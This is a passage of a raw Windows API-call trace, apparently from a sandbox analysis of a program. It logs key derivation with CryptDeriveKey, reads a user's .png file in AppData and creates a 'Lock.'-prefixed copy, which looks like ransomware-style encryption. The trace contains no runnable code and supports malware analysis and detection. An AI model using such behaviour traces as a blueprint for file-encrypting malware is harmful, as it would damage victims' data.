0xd [0149.290] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.290] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0149.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa4e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0149.290] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9e20f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2278) returned 1 [0149.290] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.291] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.291] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0149.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0149.291] CryptDestroyHash (hHash=0x9e20f8) returned 1 [0149.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/nst7Asd C.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nst7asd c.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0149.291] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.291] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0149.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0149.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0149.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0149.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0149.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0149.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.292] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0149.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0149.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0149.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.nst7Asd C.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.nst7asd c.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0149.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0149.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0149.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0149.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0149.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0149.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd3020 [0149.298] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0149.298] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0xc550, lpOverlapped=0x0) returned 1 [0149.300] ReadFile (in: hFile=0x4ec, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0149.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.300] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0149.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc550) returned 0x2aaf410 [0149.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd3020 | out: hHeap=0x2af0000) returned 1 [0149.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0149.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc550) returned 0x2abb968 [0149.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0149.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0149.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc550) returned 0x2aaf410 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0149.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0149.306] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0149.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc550) returned 0x2aaf410 [0149.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0149.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa078 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0149.307] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0149.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc550) returned 0x2ac7ec0 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0149.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0149.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0149.308] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0149.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0149.309] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0149.309] HeapFree 